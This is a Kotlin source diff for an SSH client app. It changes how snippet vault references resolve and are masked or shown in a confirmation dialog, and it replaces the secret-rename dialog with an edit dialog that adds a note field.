     internal fun isSeeded(name: String): Boolean = params[name] == seeded[name]
+
+    /**
+     * Resolved vault references; a name still missing from the map is one the look-up hasn't answered
+     * for yet. Deriving a key's public half parses a PEM, which is too slow for the composition
+     * thread, so this fills in off it — like [clipboard] — and [canRun] holds the dialog until it has.
+     */
+    internal var vaultResolutions: Map<String, VaultRef> by mutableStateOf(emptyMap())
 
     /** Clipboard contents; `null` while still being read. */
     internal var clipboard: String? by mutableStateOf(null)
@@ -152,23 +155,34 @@ class TemplateVariableValues internal constructor(
 
     /**
      * The resolved vault secrets of this run — the spans a later confirmation (the production
-     * guard's) must mask rather than print, exactly as this dialog's own preview masked them.
+     * guard's) must mask rather than print, exactly as this dialog's own preview masked them. Public
+     * material is left out: it is printed here, and masking it downstream would hide from the guard's
+     * quote the one thing that says which key the command carries.
      */
     fun vaultSecrets(): List<String> =
-        vaultResolutions.values.filterIsInstance<VaultRef.Ok>().map { it.secret }
+        vaultResolutions.values.filterIsInstance<VaultRef.Ok>().filter { it.secret }
+            // The span to hide is the one that ends up in the line, and [SnippetTemplate.assemble]
+            // flattens every context value on the way in: a password holding a tab or a zero-width
+            // character reaches the guard's quote in a form an exact replace of the raw string would
+            // walk straight past, printing it in clear.
+            .map { sanitizeSnippetValue(it.value) }
 
-    /** Whether every reference resolved: a missing vault entry has no value to send. */
+    /**
+     * Whether every reference resolved: a missing or unusable vault entry has no value to send, and
+     * one still being looked up has none *yet*.
+     */
     val canRun: Boolean
-        get() = vaultResolutions.values.all { it is VaultRef.Ok } && (!needsClipboard || clipboard != null)
+        get() = vaultRefs.all { vaultResolutions[it] is VaultRef.Ok } && (!needsClipboard || clipboard != null)
 
     /**
      * Value for [variable]. [masked] replaces vault secrets with [SECRET_MASK] — the preview path;
-     * the unmasked path is only ever called to build the line actually sent.
+     * the unmasked path is only ever called to build the line actually sent. Public material reads
+     * the same either way.
      */
     fun value(variable: SnippetSegment.Variable, masked: Boolean): String = when (variable.kind) {
         SnippetVariableKind.CLIPBOARD -> clipboard.orEmpty()
         SnippetVariableKind.VAULT -> when (val ref = vaultResolutions[variable.format.orEmpty()]) {
-            is VaultRef.Ok -> if (masked) SECRET_MASK else ref.secret
+            is VaultRef.Ok -> if (masked && ref.secret) SECRET_MASK else ref.value
             else -> ""
         }
         SnippetVariableKind.PARAM -> params[variable.name].orEmpty()
@@ -188,7 +202,13 @@ fun rememberTemplateVariableValues(
     initialParams: Map<String, String> = emptyMap(),
 ): TemplateVariableValues {
     val credentials = LocalCredentials.current
+    val generator = LocalSshKeyGenerator.current
     val clipboard = LocalClipboard.current
+    // The keychain as it stands when the confirmation opens. What freezes it is the `remember(request)`
+    // around the resolution below — this list, the seeded map and the effect all live in slots keyed on
+    // the request — so a background sync landing a secret mid-dialog cannot change what the previewed
+    // line means.
+    val entries = remember(request) { credentials?.credentials.orEmpty() }
     val values = remember(request) {
         val params = variables.filter { it.kind == SnippetVariableKind.PARAM }
         val paramNames = params.map { it.name }.distinct()
@@ -199,11 +219,25 @@ fun rememberTemplateVariableValues(
             paramChoices = firstByName.mapValues { (_, v) -> v.paramChoices() }.filterValues { it.isNotEmpty() },
             vaultRefs = vaultRefs,
             needsClipboard = variables.any { it.kind == SnippetVariableKind.CLIPBOARD },
-            vaultResolutions = vaultRefs.associateWith { resolveVaultRef(it, credentials) },
             params = mutableStateMapOf<String, String>().apply {
                 paramNames.forEach { name -> put(name, paramSeed(firstByName.getValue(name), initialParams[name])) }
             },
-        )
+        ).apply {
+            // Everything that needs no key parse is resolved here, on the spot: a password reference
+            // would otherwise spend the first frame drawing its span empty, and the dialog's whole
+            // claim is that the preview is the line that runs.
+            vaultResolutions = vaultRefs.filterNot { vaultRefNeedsKeyParse(it, entries) }
+                .associateWith { resolveVaultRef(it, entries, generator = null) }
+        }
+    }
+    val parsedRefs = remember(request) { values.vaultRefs.filter { vaultRefNeedsKeyParse(it, entries) } }
+    if (parsedRefs.isNotEmpty()) {
+        LaunchedEffect(request) {
+            val derived = withContext(Dispatchers.Default) {
+                parsedRefs.associateWith { resolveVaultRef(it, entries, generator) }
+            }
+            values.vaultResolutions = values.vaultResolutions + derived
+        }
     }
     if (values.needsClipboard) {
         LaunchedEffect(request) { values.clipboard = fetchSystemClipboardText(clipboard).orEmpty() }
@@ -271,25 +305,100 @@ fun TemplateVariableFields(values: TemplateVariableValues, autoFocus: Boolean = 
     }
     if (values.vaultRefs.isNotEmpty()) {
         FieldLabel(stringResource(Res.string.lib_snippet_vars_vault))
-        values.vaultRefs.forEach { name ->
-            key(name) {
-                val shown = vaultEntryLabel(name)
-                when (values.vaultResolutions[name]) {
-                    is VaultRef.Ok -> Row(
-                        verticalAlignment = Alignment.CenterVertically,
-                        horizontalArrangement = Arrangement.spacedBy(8.dp),
-                    ) {
-                        Txt(shown, color = Skerry.colors.text, size = 11.5.sp, font = mono)
-                        Txt(SECRET_MASK, color = Skerry.colors.faint, size = 11.5.sp, font = mono)
+        // A key reference lands after the dialog is already open and focus has moved on to the first
+        // parameter field, so the outcome has to be spoken rather than waited on to be visited. The
+        // announcer carries the text itself and outlives the change — a live region on the block
+        // whose children hold the text announces nothing (see StatusAnnouncer).
+        StatusAnnouncer(vaultRefsAnnouncement(values))
+        Column {
+            values.vaultRefs.forEach { name ->
+                key(name) {
+                    val shown = vaultEntryLabel(name)
+                    when (val ref = values.vaultResolutions[name]) {
+                        is VaultRef.Ok -> Row(
+                            verticalAlignment = Alignment.CenterVertically,
+                            horizontalArrangement = Arrangement.spacedBy(8.dp),
+                        ) {
+                            Txt(shown, color = Skerry.colors.text, size = 11.5.sp, font = mono)
+                            // A password is masked; a public key or certificate is spelled out — the
+                            // row exists to say which material the command will carry, so it draws
+                            // the value in the form the line will hold, not the stored one (a
+                            // certificate's trailing comment is its author's text).
+                            Txt(
+                                if (ref.secret) SECRET_MASK else sanitizeSnippetValue(ref.value),
+                                color = Skerry.colors.faint, size = 11.5.sp, font = mono,
+                                maxLines = 2, overflow = TextOverflow.Ellipsis,
+                            )
+                        }
+                        VaultRef.Unusable ->
+                            Txt(stringResource(Res.string.lib_snippet_vars_vault_unusable, shown), color = Skerry.colors.sunset, size = 11.5.sp)
+                        VaultRef.Ambiguous ->
+                            Txt(stringResource(Res.string.lib_snippet_vars_vault_ambiguous, shown), color = Skerry.colors.sunset, size = 11.5.sp)
+                        VaultRef.Missing ->
+                            Txt(stringResource(Res.string.lib_snippet_vars_vault_missing, shown), color = Skerry.colors.sunset, size = 11.5.sp)
+                        // Still being looked up: named, not an ellipsis, so the dialog doesn't claim
+                        // the entry is missing while the answer is on its way — and so a screen
+                        // reader has something to say when it reaches the row.
+                        null -> Txt(stringResource(Res.string.lib_snippet_vars_vault_reading, shown), color = Skerry.colors.dim, size = 11.5.sp)
                     }
-                    VaultRef.NotAPassword ->
-                        Txt(stringResource(Res.string.lib_snippet_vars_vault_not_password, shown), color = Skerry.colors.sunset, size = 11.5.sp)
-                    else ->
-                        Txt(stringResource(Res.string.lib_snippet_vars_vault_missing, shown), color = Skerry.colors.sunset, size = 11.5.sp)
                 }
             }
         }
     }
+}
+
+/**
+ * The line a confirmation adds when the run really does put a secret on the wire — and only then: a
+ * run whose only vault reference is a public key carries nothing to warn about, and a warning that
+ * cries wolf is the one nobody reads before the run that does carry a password.
+ *
+ * [secrets] is what the caller will hand to the production guard, so the notice and the masking can
+ * never disagree about what the line holds. Shared by the snippet confirmation and the runbook one;
+ * [topPadding] is the only thing that differs between them.
+ */
+@Composable
+fun SecretPlaintextNotice(secrets: List<String>, topPadding: Dp) {
+    if (secrets.isEmpty()) return
+    Txt(
+        stringResource(Res.string.lib_snippet_vars_secret_note),
+        color = Skerry.colors.faint, size = 11.sp, lineHeight = 15.sp,
+        modifier = Modifier.padding(top = topPadding),
+    )
+}
+
+/** How many references the announcement spells out before it starts counting the rest. */
+private const val MAX_ANNOUNCED_REFS = 5
+
+/**
+ * The one line the vault block is worth saying out loud, or the empty string while it has nothing to
+ * report yet — an outcome per reference, in the order they are drawn.
+ *
+ * Silent until every reference has answered: a partial state would announce twice for one dialog,
+ * and the string is the state, so an unchanged one stays silent anyway ([StatusAnnouncer]). The
+ * resolved case is named, not read out — a resolved password is a mask on screen, and a resolved key
+ * is several hundred characters nobody wants spoken.
+ */
+@Composable
+private fun vaultRefsAnnouncement(values: TemplateVariableValues): String {
+    if (values.vaultRefs.any { values.vaultResolutions[it] == null }) return ""
+    // Bounded: the reference count comes from a template that may have been shared, and a live
+    // region cannot be interrupted the way a list can be scrolled past. The tail is counted, not
+    // dropped in silence — the same shape a row of host names uses when it runs out of room.
+    val spoken = values.vaultRefs.take(MAX_ANNOUNCED_REFS).map { name ->
+        val shown = vaultEntryLabel(name)
+        when (values.vaultResolutions[name]) {
+            is VaultRef.Ok -> stringResource(Res.string.lib_snippet_vars_vault_ready, shown)
+            VaultRef.Unusable -> stringResource(Res.string.lib_snippet_vars_vault_unusable, shown)
+            VaultRef.Ambiguous -> stringResource(Res.string.lib_snippet_vars_vault_ambiguous, shown)
+            VaultRef.Missing -> stringResource(Res.string.lib_snippet_vars_vault_missing, shown)
+            null -> ""
+        }
+    }.joinToString(". ")
+    val rest = values.vaultRefs.size - MAX_ANNOUNCED_REFS
+    if (rest <= 0) return spoken
+    // Worded, not the "+N" the rows would draw: this string is only ever heard, and a screen reader
+    // set to skip punctuation reads a bare "+3" as a number with nothing to attach it to.
+    return spoken + ". " + pluralStringResource(Res.plurals.lib_snippet_vars_vault_more, rest, rest)
 }
 
 /**

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/VaultRefResolution.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/VaultRefResolution.kt
@@ -1,0 +1,69 @@
+package app.skerry.ui.snippet
+
+import app.skerry.shared.snippet.SnippetVaultValue
+import app.skerry.shared.snippet.snippetVaultValue
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+import app.skerry.shared.vault.SshKeyGenerator
+
+// Turning a `${'$'}{{vault:name}}` reference into the material a command may carry. Pure and
+// non-composable — [TemplateVariables] owns the state and the rows this feeds.
+
+/**
+ * Vault reference resolution, done once when the confirmation opens.
+ *
+ * [Ok.secret] separates a password from public material (a key's public half, a certificate): the
+ * first is masked everywhere it is quoted, the second is shown — hiding the public key a command is
+ * about to append to `authorized_keys` would tell the user nothing about what they are confirming.
+ */
+internal sealed interface VaultRef {
+    data class Ok(val value: String, val secret: Boolean) : VaultRef {
+        // A resolved password is the secret itself: it must not reach a log or a crash report through
+        // a generated toString, as the payload types it comes from already ensure.
+        override fun toString(): String = if (secret) "Ok(redacted)" else "Ok($value)"
+    }
+
+    data object Missing : VaultRef
+
+    /**
+     * The name matches more than one entry. Nothing stops two secrets sharing a label, and a
+     * reference resolves by label: picking the first would splice a password into one run and a
+     * public key into the next, in whatever order the store happened to list them after a sync.
+     */
+    data object Ambiguous : VaultRef
+
+    data object Unusable : VaultRef
+}
+
+/** The single entry a reference names; `null` when nothing or more than one thing answers to it. */
+private fun entryNamed(name: String, entries: List<Credential>): Credential? =
+    entries.filter { it.label == name }.singleOrNull()
+
+/**
+ * Whether resolving [name] has to parse a private key — the one look-up too slow for the composition
+ * thread, and the reason vault references resolve asynchronously at all.
+ */
+internal fun vaultRefNeedsKeyParse(name: String, entries: List<Credential>): Boolean =
+    entryNamed(name, entries)?.secret is CredentialSecret.PrivateKey
+
+/**
+ * Looks the entry up by label and asks [snippetVaultValue] what it may hand over. `null` [generator]
+ * (no crypto provider on this platform build) simply derives no public key, so a key reference
+ * reports itself unusable instead of resolving to nothing.
+ */
+internal fun resolveVaultRef(
+    name: String,
+    entries: List<Credential>,
+    generator: SshKeyGenerator?,
+): VaultRef {
+    if (entries.count { it.label == name } > 1) return VaultRef.Ambiguous
+    val entry = entryNamed(name, entries) ?: return VaultRef.Missing
+    val value = snippetVaultValue(entry) { pem, passphrase ->
+        runCatching { generator?.inspect(pem, passphrase)?.publicKeyOpenSsh }.getOrNull()
+    }
+    return when (value) {
+        is SnippetVaultValue.Secret -> VaultRef.Ok(value.value, secret = true)
+        is SnippetVaultValue.Public -> VaultRef.Ok(value.value, secret = false)
+        SnippetVaultValue.Unusable -> VaultRef.Unusable
+    }
+}

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultDialogs.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultDialogs.kt
@@ -50,6 +50,8 @@ import androidx.compose.ui.text.input.KeyboardType
 import androidx.compose.ui.text.input.PasswordVisualTransformation
 import androidx.compose.ui.unit.dp
 import androidx.compose.ui.unit.sp
+import app.skerry.shared.text.capNotes
+import app.skerry.shared.text.normalizeNotes
 import app.skerry.shared.vault.SshCertificateInspector
 import app.skerry.shared.vault.SshKeyType
 import app.skerry.ui.generated.resources.Res
@@ -99,8 +101,10 @@ import app.skerry.ui.generated.resources.vault_placeholder_name_key_file
 import app.skerry.ui.generated.resources.vault_placeholder_name_password
 import app.skerry.ui.generated.resources.vault_placeholder_optional
 import app.skerry.ui.generated.resources.vault_placeholder_password
-import app.skerry.ui.generated.resources.vault_rename
-import app.skerry.ui.generated.resources.vault_rename_title
+import app.skerry.ui.generated.resources.vault_edit_title
+import app.skerry.ui.generated.resources.vault_field_note
+import app.skerry.ui.generated.resources.vault_placeholder_note
+import app.skerry.ui.generated.resources.vault_save
 import app.skerry.ui.nav.PlatformBackHandler
 import app.skerry.ui.vault.title
 import kotlinx.coroutines.launch
@@ -296,20 +300,38 @@ internal fun PasswordConfirmDialog(
 }
 
 /**
- * Renames a keychain secret: a single prefilled NAME field. The secret material and id are untouched
- * (only the label changes). Confirm is enabled only for a non-blank label that actually differs — a
- * rename to the same name is a pointless sync push. Shared by desktop and mobile. [onConfirm] gets the
- * trimmed label.
+ * Edits what a keychain secret is called: its NAME and its free-form NOTE. The secret material and
+ * id are untouched. Confirm is enabled only for a non-blank name once something actually changed —
+ * re-saving identical text is a pointless sync push. Shared by desktop and mobile. [onConfirm] gets
+ * the trimmed label and the normalized note (`null` when it is blank).
  */
 @Composable
-internal fun RenameSecretDialog(currentLabel: String, onDismiss: () -> Unit, onConfirm: (String) -> Unit) {
+internal fun EditSecretDialog(
+    currentLabel: String,
+    currentNote: String?,
+    onDismiss: () -> Unit,
+    onConfirm: (label: String, note: String?) -> Unit,
+) {
     var name by remember { mutableStateOf(currentLabel) }
+    var note by remember { mutableStateOf(currentNote.orEmpty()) }
     val trimmed = name.trim()
-    val valid = trimmed.isNotEmpty() && trimmed != currentLabel
-    VaultDialogScaffold(stringResource(Res.string.vault_rename_title, currentLabel), null, onDismiss) {
+    val normalizedNote = normalizeNotes(note)
+    val valid = trimmed.isNotEmpty() && (trimmed != currentLabel || normalizedNote != currentNote)
+    VaultDialogScaffold(stringResource(Res.string.vault_edit_title, currentLabel), null, onDismiss) {
         // The old label arrives prefilled: select it so typing replaces the name outright.
         DialogField(stringResource(Res.string.vault_field_name), name, { name = it }, placeholder = currentLabel, selectAllOnFocus = name == currentLabel)
-        DialogButtons(confirmLabel = stringResource(Res.string.vault_rename), confirmEnabled = valid, onDismiss = onDismiss, onConfirm = { onConfirm(trimmed) })
+        // Capped per keystroke, so the field can never hold more than the store would keep.
+        Box(Modifier.padding(top = 16.dp)) {
+            DialogField(
+                stringResource(Res.string.vault_field_note),
+                note,
+                { note = capNotes(it) },
+                placeholder = stringResource(Res.string.vault_placeholder_note),
+                singleLine = false,
+                mono = false,
+            )
+        }
+        DialogButtons(confirmLabel = stringResource(Res.string.vault_save), confirmEnabled = valid, onDismiss = onDismiss, onConfirm = { onConfirm(trimmed, normalizedNote) })
     }
 }
 
@@ -373,6 +395,12 @@ internal fun DialogField(
     placeholder: String,
     password: Boolean = false,
     singleLine: Boolean = true,
+    /**
+     * Monospace, at the smaller size a blob needs. Default for a multi-line field, which in this
+     * dialog set means a PEM or a certificate; a note is prose and reads in the UI font, the same
+     * way it is written in the connection form and drawn back in the panel.
+     */
+    mono: Boolean = !singleLine,
     // Explicit keyboard type override: for visible but sensitive fields (PEM key) set
     // KeyboardType.Password — disables IME autocorrect/dictionary without visually masking input.
     keyboardType: KeyboardType? = null,
@@ -380,11 +408,10 @@ internal fun DialogField(
     selectAllOnFocus: Boolean = false,
 ) {
     val ui = LocalFonts.current.ui
-    val mono = LocalFonts.current.mono
-    // Multi-line fields (PEM/certificate) use monospace so long blobs read like a file.
+    val monoFont = LocalFonts.current.mono
     val textColor = Skerry.colors.text
-    val style = remember(ui, mono, singleLine, textColor) {
-        TextStyle(color = textColor, fontSize = if (singleLine) 13.sp else 11.sp, fontFamily = if (singleLine) ui else mono)
+    val style = remember(ui, monoFont, mono, textColor) {
+        TextStyle(color = textColor, fontSize = if (mono) 11.sp else 13.sp, fontFamily = if (mono) monoFont else ui)
     }
     // Auto-scroll to focus above the keyboard. The window in adjustResize mode (see AndroidManifest)
     // shrinks itself when the keyboard appears, so WindowInsets.ime is always 0 here — observing the inset
@@ -434,7 +461,7 @@ internal fun DialogField(
                         .padding(horizontal = 11.dp, vertical = 10.dp)
                         .then(if (singleLine) Modifier else Modifier.verticalScroll(rememberScrollState())),
                 ) {
-                    if (value.isEmpty()) Txt(placeholder, color = Skerry.colors.faint, size = if (singleLine) 13.sp else 11.sp, font = if (singleLine) ui else mono)
+                    if (value.isEmpty()) Txt(placeholder, color = Skerry.colors.faint, size = if (mono) 11.sp else 13.sp, font = if (mono) monoFont else ui)
                     inner()
                 }
             },

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultMockData.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultMockData.kt
@@ -11,8 +11,12 @@ import app.skerry.shared.vault.CredentialUsage
  * separate mock layout would drift the moment a column changes.
  */
 internal fun mockSecrets(): List<Pair<Credential, String>> = listOf(
-    Credential("m1", "id_ed25519 — deploy", CredentialSecret.PrivateKey("mock-pem", passphrase = "mock")) to
-        "ED25519 · SHA256:9pQk…dR2f · prod-web-01, prod-web-02",
+    Credential(
+        "m1",
+        "id_ed25519 — deploy",
+        CredentialSecret.PrivateKey("mock-pem", passphrase = "mock"),
+        note = "Deploy key for the web tier. Rotate with the quarterly key sweep.",
+    ) to "ED25519 · SHA256:9pQk…dR2f · prod-web-01, prod-web-02",
     Credential("m2", "id_rsa — legacy jump", CredentialSecret.PrivateKey("mock-pem")) to
         "RSA-4096 · SHA256:1cTz…88Aa · jump.corp",
     Credential("m3", "db-master · postgres", CredentialSecret.Password("mock")) to

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultMockView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultMockView.kt
@@ -123,6 +123,7 @@ internal fun MockVaultView() {
 private fun MockSecretDetail(credential: Credential, mono: FontFamily) {
     Column(Modifier.width(DETAIL_PANEL_WIDTH).fillMaxHeight().background(Skerry.colors.surface2).verticalScroll(rememberScrollState()).padding(horizontal = 20.dp, vertical = 18.dp)) {
         DetailLabel(credential.label)
+        SecretNote(credential.note)
         SecretFactRows(
             typeLabel = "ED25519",
             fingerprint = "SHA256:9pQk…dR2f",

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultSecretDetail.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultSecretDetail.kt
@@ -25,6 +25,8 @@ import androidx.compose.ui.Alignment
 import androidx.compose.ui.Modifier
 import androidx.compose.ui.draw.clip
 import androidx.compose.ui.graphics.Color
+import androidx.compose.ui.semantics.contentDescription
+import androidx.compose.ui.semantics.semantics
 import androidx.compose.ui.text.font.FontFamily
 import androidx.compose.ui.text.font.FontWeight
 import androidx.compose.ui.unit.dp
@@ -49,18 +51,19 @@ import app.skerry.ui.generated.resources.vault_copy_certificate
 import app.skerry.ui.generated.resources.vault_copy_password
 import app.skerry.ui.generated.resources.vault_copy_public_key
 import app.skerry.ui.generated.resources.vault_delete
+import app.skerry.ui.generated.resources.vault_edit
 import app.skerry.ui.generated.resources.vault_export_key
 import app.skerry.ui.generated.resources.vault_export_certificate
 import app.skerry.ui.generated.resources.vault_key_unreadable
 import app.skerry.ui.generated.resources.vault_label_cert_path
 import app.skerry.ui.generated.resources.vault_label_key_path
+import app.skerry.ui.generated.resources.vault_label_note
 import app.skerry.ui.generated.resources.vault_label_principals
 import app.skerry.ui.generated.resources.vault_label_public_key
 import app.skerry.ui.generated.resources.vault_label_serial
 import app.skerry.ui.generated.resources.vault_label_signing_ca
 import app.skerry.ui.generated.resources.vault_label_valid
 import app.skerry.ui.generated.resources.vault_not_attached
-import app.skerry.ui.generated.resources.vault_rename
 import app.skerry.ui.generated.resources.vault_subtitle_certificate
 import app.skerry.ui.generated.resources.vault_subtitle_certificate_typed
 import app.skerry.ui.generated.resources.vault_subtitle_key_file
@@ -71,7 +74,9 @@ import app.skerry.ui.generated.resources.vault_used_by
 import app.skerry.ui.generated.resources.vault_used_by_one
 import app.skerry.ui.generated.resources.vault_used_by_snippets
 import app.skerry.ui.generated.resources.vault_used_by_snippets_one
+import app.skerry.ui.design.sanitizeServerText
 import app.skerry.ui.host.rowLabel
+import app.skerry.ui.terminal.MAX_NOTE_CHARS
 import app.skerry.ui.known.shortFingerprint
 import kotlinx.coroutines.Dispatchers
 import kotlinx.coroutines.withContext
@@ -140,7 +145,7 @@ internal fun LiveSecretDetail(
     onCopyPassword: (String) -> Unit,
     onExportKey: (SecretExport.PrivateKey) -> Unit,
     onExportPublic: (SecretExport.Public) -> Unit,
-    onRename: () -> Unit,
+    onEdit: () -> Unit,
     onDelete: () -> Unit,
 ) {
     val secret = credential.secret
@@ -159,6 +164,7 @@ internal fun LiveSecretDetail(
     }
     Column(Modifier.width(DETAIL_PANEL_WIDTH).fillMaxHeight().background(Skerry.colors.surface2).verticalScroll(rememberScrollState()).padding(horizontal = 20.dp, vertical = 18.dp)) {
         DetailLabel(credential.label)
+        SecretNote(credential.note)
         SecretFactRows(
             typeLabel = subtitle,
             // A password has no fingerprint, and a key still being parsed has none yet — the row is
@@ -184,8 +190,8 @@ internal fun LiveSecretDetail(
         }
         UsedByHosts(hosts, snippetLabels, mono)
         Column(verticalArrangement = Arrangement.spacedBy(8.dp)) {
-            // Copy is type-specific (what's copyable differs); rename is universal and edits only the
-            // label (see onRename); delete/export are type-specific again.
+            // Copy is type-specific (what's copyable differs); edit is universal and touches only the
+            // name and the note (see onEdit); delete/export are type-specific again.
             when (secret) {
                 is CredentialSecret.Certificate ->
                     PrimaryButton(stringResource(Res.string.vault_copy_certificate), onClick = { onCopy(secret.certificate) }, icon = "content_copy", modifier = Modifier.fillMaxWidth())
@@ -199,7 +205,7 @@ internal fun LiveSecretDetail(
                 // Nothing to copy: the material is on disk, and the refs are already spelled out above.
                 is CredentialSecret.KeyFile -> Unit
             }
-            GhostButton(stringResource(Res.string.vault_rename), onClick = onRename, modifier = Modifier.fillMaxWidth())
+            GhostButton(stringResource(Res.string.vault_edit), onClick = onEdit, modifier = Modifier.fillMaxWidth())
             // Export writes the private key — the half of a key or a certificate that is otherwise
             // trapped in the vault; it is labelled for what it hands out, and the host
             // re-authenticates first. A certificate's public half gets its own button rather than a
@@ -341,6 +347,33 @@ internal fun KeyFileDetailBody(secret: CredentialSecret.KeyFile, state: KeyFileS
         Txt(stringResource(Res.string.vault_cert_from_file_unreadable), color = Skerry.colors.sunset, size = 11.sp, modifier = Modifier.padding(bottom = 16.dp))
     }
     state?.certificate?.let { CertificateDetailBody(it, mono) }
+}
+
+/**
+ * The free-form remark under a secret's name, on desktop and in the mobile sheet. Absent for a
+ * secret without one — an empty block under every name would push the facts down for nothing.
+ *
+ * The note is free-form text that arrives from wherever the vault was last written — this device or
+ * another one over sync — so it keeps its lines (it is prose), but not the characters that would let
+ * it draw as something it is not, and not more of them than the panel will show
+ * ([sanitizeServerText]). The keychain is personal, so this is defence in depth rather than an
+ * untrusted-input boundary; it costs one filter and removes the question.
+ *
+ * Sighted readers know this line is the note from where it sits and how dim it is; a screen reader
+ * gets neither, so the block names itself and would otherwise read as an unlabelled sentence between
+ * the secret's name and its facts.
+ */
+@Composable
+internal fun SecretNote(note: String?) {
+    val shown = remember(note) { note?.let { sanitizeServerText(it, MAX_NOTE_CHARS, allowNewlines = true) } }
+    if (shown.isNullOrBlank()) return
+    val label = stringResource(Res.string.vault_label_note)
+    Txt(
+        shown,
+        color = Skerry.colors.dim, size = 11.5.sp, lineHeight = 17.sp,
+        // Comma-joined, the way Compose joins the texts it merges (see design/fieldValueName).
+        modifier = Modifier.padding(bottom = 14.dp).semantics { contentDescription = "$label, $shown" },
+    )
 }
 
 @Composable

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/vault/VaultView.kt
@@ -155,7 +155,7 @@ private fun LiveVaultView(credentials: CredentialManagerController) {
     val secretFiles = LocalSecretFileReader.current
     var showImportCert by remember { mutableStateOf(false) }
     var showLinkKeyFile by remember { mutableStateOf(false) }
-    var pendingRenameCred by remember { mutableStateOf<Credential?>(null) }
+    var pendingEditCred by remember { mutableStateOf<Credential?>(null) }
     var pendingDeleteCred by remember { mutableStateOf<Credential?>(null) }
 
     val credItems = VaultPresentation.credentialsIn(category, allCreds)
@@ -232,7 +232,7 @@ private fun LiveVaultView(credentials: CredentialManagerController) {
                             onExportPublic = { export ->
                                 exportPublic(export, scope) { exportFailed = it.worthReporting }
                             },
-                            onRename = { pendingRenameCred = credential },
+                            onEdit = { pendingEditCred = credential },
                             onDelete = { pendingDeleteCred = credential },
                         )
                     }
@@ -306,17 +306,18 @@ private fun LiveVaultView(credentials: CredentialManagerController) {
                 },
             )
         }
-        pendingRenameCred?.let { target ->
-            // Rename edits only the label; the id (which hosts reference) and the secret stay put, and
-            // the change propagates to sync on its own (see CredentialManagerController.rename).
-            RenameSecretDialog(
+        pendingEditCred?.let { target ->
+            // Editing touches only the name and the note; the id (which hosts reference) and the secret
+            // stay put, and the change propagates to sync on its own (see CredentialManagerController.edit).
+            EditSecretDialog(
                 currentLabel = target.label,
-                onDismiss = { pendingRenameCred = null },
-                onConfirm = { newLabel ->
+                currentNote = target.note,
+                onDismiss = { pendingEditCred = null },
+                onConfirm = { newLabel, newNote ->
                     // Abort on a lock race: idle auto-lock can fire while the dialog is open, and vault
                     // CRUD throws once locked. Mirrors the delete guard just below.
-                    if (vault?.isUnlocked == true) credentials.rename(target.id, newLabel)
-                    pendingRenameCred = null
+                    if (vault?.isUnlocked == true) credentials.edit(target.id, newLabel, newNote)
+                    pendingEditCred = null
                 },
             )
         }

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/host/NewConnectionFormStateTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/host/NewConnectionFormStateTest.kt
@@ -2,7 +2,7 @@ package app.skerry.ui.host
 
 import app.skerry.shared.host.Host
 import app.skerry.shared.ssh.ConnectionType
-import app.skerry.shared.host.MAX_NOTES_LENGTH
+import app.skerry.shared.text.MAX_NOTES_LENGTH
 import app.skerry.ui.identity.CredentialDraft
 import app.skerry.ui.identity.CredentialKind
 import kotlin.test.Test

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/identity/CredentialManagerControllerTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/identity/CredentialManagerControllerTest.kt
@@ -5,13 +5,6 @@ import app.skerry.shared.vault.CredentialSecret
 import app.skerry.shared.vault.CredentialStore
 import app.skerry.shared.vault.CredentialUsage
 import app.skerry.shared.vault.CredentialUsageLog
-import app.skerry.shared.vault.DataKey
-import app.skerry.shared.vault.MergeResult
-import app.skerry.shared.vault.RecordType
-import app.skerry.shared.vault.SyncMeta
-import app.skerry.shared.vault.UnlockResult
-import app.skerry.shared.vault.Vault
-import app.skerry.shared.vault.VaultRecord
 import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.Dispatchers
 import kotlinx.coroutines.ExperimentalCoroutinesApi
@@ -89,11 +82,11 @@ class CredentialManagerControllerTest {
     }
 
     @Test
-    fun `rename changes the label in the reactive list and keeps id and secret`() {
+    fun `edit changes the label in the reactive list and keeps id and secret`() {
         val controller = CredentialManagerController(CredentialStore(FakeCredVault())) { "gen" }
         controller.save(CredentialDraft(label = "old", kind = CredentialKind.PRIVATE_KEY, privateKeyPem = "pem", passphrase = "pp"))
 
-        controller.rename("gen", "new")
+        controller.edit("gen", "new", note = null)
 
         val c = controller.credentials.single()
         assertEquals("gen", c.id)
@@ -102,12 +95,27 @@ class CredentialManagerControllerTest {
     }
 
     @Test
-    fun `rename of a missing id is a no-op`() {
+    fun `edit of a missing id is a no-op`() {
         val controller = CredentialManagerController(CredentialStore(FakeCredVault())) { "gen" }
 
-        controller.rename("missing", "x")
+        controller.edit("missing", "x", note = null)
 
         assertEquals(emptyList(), controller.credentials)
+    }
+
+    @Test
+    fun `edit writes the note, and re-saving the secret keeps it`() {
+        val controller = CredentialManagerController(CredentialStore(FakeCredVault())) { "gen" }
+        controller.save(CredentialDraft(label = "temp key", kind = CredentialKind.PRIVATE_KEY, privateKeyPem = "pem"))
+        controller.edit("gen", "temp key", note = "drop after the audit")
+
+        // Rotating the material goes through the form, which has no note field: the remark on the
+        // secret must survive that write rather than be silently dropped.
+        controller.save(CredentialDraft(id = "gen", label = "temp key", kind = CredentialKind.PRIVATE_KEY, privateKeyPem = "pem2"))
+
+        val c = controller.credentials.single()
+        assertEquals("drop after the audit", c.note)
+        assertEquals(CredentialSecret.PrivateKey("pem2"), c.secret)
     }
 
     @Test
@@ -293,40 +301,4 @@ private class FakeUsageLog : CredentialUsageLog {
 
